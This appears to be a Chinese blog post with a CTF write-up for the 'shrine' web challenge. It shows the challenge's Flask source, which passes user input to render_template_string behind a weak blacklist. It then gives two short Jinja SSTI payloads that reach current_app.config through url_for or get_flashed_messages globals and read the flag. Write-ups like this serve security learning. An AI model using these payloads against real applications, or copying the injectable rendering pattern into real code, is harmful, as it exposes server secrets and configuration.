互动

攻防世界34-shrine-CTFWeb

Administrator 字数: 1969 阅读耗时: 4 分钟 2024/11/09 博客独享热度: 2 评论:

攻防世界34-shrine-CTFWeb

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

尝试下，是个SSTI问题，并且过滤()和config和self

flag在app.config['FLAG'] = os.environ.pop('FLAG')里

payload:
/shrine/{{url_for.__globals__['current_app'].config}}
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

记住就行

Matriy's blog

分享设计与科技生活

打赏作者

感谢你赐予我前进的力量

微信
支付宝

赞赏者名单

因为你们的支持让我意识到写文章的价值🙏

本文是原创文章，采用 CC BY-NC-ND 4.0 协议，完整转载请注明来自 Matriy

Web漏洞挖掘 44 SSTI 4

阅读建议

2024-12-18

CTFshow-文件上传(Web151-170)

2024-12-17

CTFshow-php特性(Web89-115)

匿名评论隐私政策

你无需删除空行，直接评论以获取最佳展示效果